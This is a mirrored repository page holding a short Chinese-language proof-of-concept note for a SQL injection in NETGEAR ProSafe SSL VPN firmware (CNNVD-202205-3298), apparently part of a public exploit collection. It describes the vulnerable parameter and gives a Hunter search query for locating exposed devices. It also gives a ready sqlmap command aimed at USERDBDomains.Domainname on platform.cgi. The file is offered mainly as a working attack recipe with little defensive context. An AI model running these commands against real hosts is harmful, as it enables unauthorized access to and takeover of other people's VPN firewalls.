admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 10:25:55 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/NETGEAR/NETGEARProSafeSSLVPNSQL注入(CNNVD-202205-3298).md

27 lines
1.1 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# NETGEAR ProSafe SSL VPN SQL注入CNNVD-202205-3298
# 一、漏洞简介
NETGEAR FVS336G是美国网件NETGEAR公司的一款VPN虚拟私人网络防火墙路由器。NETGEAR ProSafe SSL VPN firmware FVS336Gv2 和FVS336Gv3版本存在安全漏洞该漏洞源于cgi-bin/platform.cgi中的USERDBDomains.Domainname参数缺少过滤转义。攻击者可利用该漏洞进行SQL注入攻击进而控制系统。
# 二、影响版本
+ NETGEAR ProSafe SSL VPN
# 三、资产测绘
+ hunter`app.name=="NETGEAR ProSAFE"`
+ 特征
![1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce.png](./img/3-oAw2G2HWdioD_W/1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce-587289.png)
# 四、漏洞复现
**sqlmap **
```plain
sqlmap -u "https://xx.xx.xx.xx/scgi-bin/platform.cgi" --form -p USERDBDomains.Domainname --batch
```
![1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee.png](./img/3-oAw2G2HWdioD_W/1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee-692978.png)
> 更新: 2024-02-29 23:57:14
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mvw70mskzp0yhtyf>
Reference in New Issue Copy Permalink